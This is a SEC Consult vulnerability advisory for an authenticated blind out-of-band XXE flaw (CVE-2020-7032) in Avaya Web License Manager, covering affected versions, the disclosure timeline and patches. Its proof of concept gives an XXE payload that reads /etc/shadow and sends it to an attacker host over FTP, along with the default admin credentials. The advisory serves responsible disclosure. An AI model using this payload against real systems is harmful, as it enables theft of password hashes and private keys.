Blind Out-of-band XML External Entity Injection In Avaya Web License Manager

Title

Blind Out-Of-Band XML External Entity Injection (Authenticated)

Product

Avaya Web License Manager

Vulnerable Version

6.x, 7.0 through 7.1.3.6, 8.0 through 8.1.2.0.0

Fixed Version

7.1.3.7 and 8.1.3

CVE Number

CVE-2020-7032

Impact

medium

Found

03.01.2020

By

M. Koplin (Office Munich) | SEC Consult Vulnerability Lab

By using an XXE injection it is possible to read confidential data like /etc/shadow or private keys. In addition, a special payload can affect the availability of the web application.

Vendor Description

“As a global leader in delivering superior communications experiences, Avaya provides the most complete portfolio of software and services for multi-touch contact center and unified communications offered on premises, in the cloud, or a hybrid. Today’s digital world centers on communications enablement, and no other company is better positioned to do this than Avaya.”

Source: https://www.avaya.com/en/

Business Recommendation

The vendor provides a patch for the Avaya Web License Manager which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability Overview / Description

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

This vulnerability within the Avaya Web License Manager (WebLM) allows an authenticated user to read arbitrary files in the context of the Webserver (Tomcat) by uploading a specially crafted XML file within the License upload functionality. Accessible sensitive files that can be read are for example /etc/shadow, SSH keys or other configuration files.

Proof Of Concept

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

Login as a user to $IP/WebLM/ and navigate to “Install License”. If WebLM has never been used before or not hardened, the default credentials are admin:weblmadmin

Create an XML file like the following:

<?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>

and a DTD file like:

<!ENTITY % d SYSTEM "file:///etc/shadow"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">

Start a webserver, e.g.

SimpleHTTPServer

python -m SimpleHTTPServer 80

and an FTP Server like GO XXE FTP Server

./xxeserv 2121

Upload the crafted XML file by clicking the install button.

Vulnerable / Tested Versions

The following version has been tested:

  • Avaya Web License Manager 6.3

The vendor doesn’t support versions < 7.x. Probably all versions <7 are affected.

Vendor Contact Timeline

2020-03-18 Contacting vendor through securityalerts@avaya.com
2020-03-19 Vendor replied and started the process to verify the vulnerability
2020-04-03 Second mail to vendor to check if they have verified the issue
2020-05-18 Release of Hotfix for WebLM (embedded with SMGR) version 8.1.2.x
2020-07-01 Advisory release postponed, due to a delayed patch for version 7
2020-11-16 Patch release for version 7 and 8 of WebLM standalone and SMGR
2020-11-17 Publication of the advisory

Solution

Version 6: Upgrade to a new major release

Version 7: Upgrade to 7.1.3.7 or later

Version 8: Install hot fix #7 or upgrade to version 8.1.3

Offiial patch: https://downloads.avaya.com/css/P8/documents/101072249

Workaround

No workaround available.

Advisory URL

Vulnerability Lab

 

EOF Markus Koplin / @2020

 

Interested to work with the experts of SEC Consult? Send us your application
Want to improve your own cyber security with the experts of SEC Consult? 
Contact our local offices.